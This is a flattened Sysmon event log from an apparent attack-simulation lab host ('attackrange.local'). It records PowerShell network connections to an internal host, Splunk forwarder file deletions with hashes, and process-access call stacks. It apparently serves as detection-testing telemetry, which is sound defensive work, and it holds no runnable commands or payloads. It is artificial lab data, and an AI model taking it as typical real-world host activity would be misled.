354300x800000000000000035128175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:54.597{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62117-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:30.448{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4311B00E5E8868DB6E81F25A6D2BFC68,SHA256=464079119447ADF7ACC8FBFBF9D4E8C61AD5A5B1D47D6FA80719AF1D01057B83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:31.497{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB10E7B3378F53D3C168F30D597BF3EC,SHA256=33823B90BB682CE7EC9D157AD427585F2799379252187F061F349765ED5FFB56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:32.780{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF724f125f.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:32.528{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C03BB120A9798AB80A7864788B64E790,SHA256=326B83B19B5A836FEA0BF352D65C9012BBCF25AA279BDCA520A6308E11B67CB8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:33.545{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2FDA65623747058EF2DEA105BDF867C,SHA256=017A1C52F57CE0398F97B4CC4F424722706D802208CC6068F124AD16CDD84930,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:33.445{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1189F4711D7ED10AB3ACE9F2AC20FDEA,SHA256=D430FBCD360450B433E06015E7D673AF4C907B2E710389DCB578987084A68294,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:33.080{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:33.080{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:33.080{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035128185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:58.609{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62118-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:34.594{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2178CD1E014087760231A8B053E39448,SHA256=456474789CEA78E1DD401060980769846FD385B923A98DFA4AF53193DE8059B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:59.224{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62119-false10.0.1.12-8000- 23542300x800000000000000035128186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:35.609{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A8E5FA09767A2088709BC7A79AB8297,SHA256=90D560C63003363AD71CDE94C6998C4615DFE9C1ADB9BFCB9902332E856CE19E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:36.623{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70BA629B09D449F178794B31E092C8BC,SHA256=6234A75AE0AF2FA5B07E8CC3F2A506BC6824EDFDC05D73D6A9BE0EAF18348015,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:37.990{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E1065E5BF84AB7B2FE71AAC83F095D85,SHA256=92860E1689FA97738D2235AD066B83ECE9282D704871E5A4FF270BC581E6ECB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:37.640{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD8EC85CB7DB5713748ECE99DB02711C,SHA256=DC58E8B38D2441FDBCC4DA872FB4F17CE2B500410D303C8D05FA6282FA368C0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:38.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D9E07DE457BF4D3709E618BB020A119,SHA256=6C705A3264836ACD20EE27DC02BED1A595C64FBB077630EB9D77B0094AF075CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:04.620{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62121-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035128194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:04.271{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62120-false10.0.1.12-8000- 23542300x800000000000000035128193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:39.676{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=998D14FB29D6C1BA4F94136A0A9F3FC4,SHA256=96E477A06CC46E5841C8533375BCF6A1B5ECE6FFD75891D63D55EF25E4830CF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:39.545{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AFA54F484E0D096A5DC72B7A23906B1D,SHA256=B46D1A40D35AA834027FEB258F1BCD826C0B175D49A3438AD93F9846CC12F8A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:40.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=740321A5404EEDFDE4CE81D13010F9D7,SHA256=35EB33CB3D5C15FA550D42D640FC8F593FFEAE9CCACB9687861BF942C8325950,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:40.674{B81B27B7-8354-613A-CB96-03000000C801}64602936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:40.522{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8354-613A-CB96-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:40.522{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:40.522{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:40.522{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:40.522{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:40.522{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8354-613A-CB96-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:40.522{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8354-613A-CB96-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:40.507{B81B27B7-8354-613A-CB96-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.742{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62BE0F3BEF8446145966235F194C4EC1,SHA256=8F4A0D6D7E239EB299BB17392A9F5609AEC729ACF2E90A2BB9FAE58F78D59C4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.676{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8355-613A-CD96-03000000C801}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.673{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.673{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:41.673{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 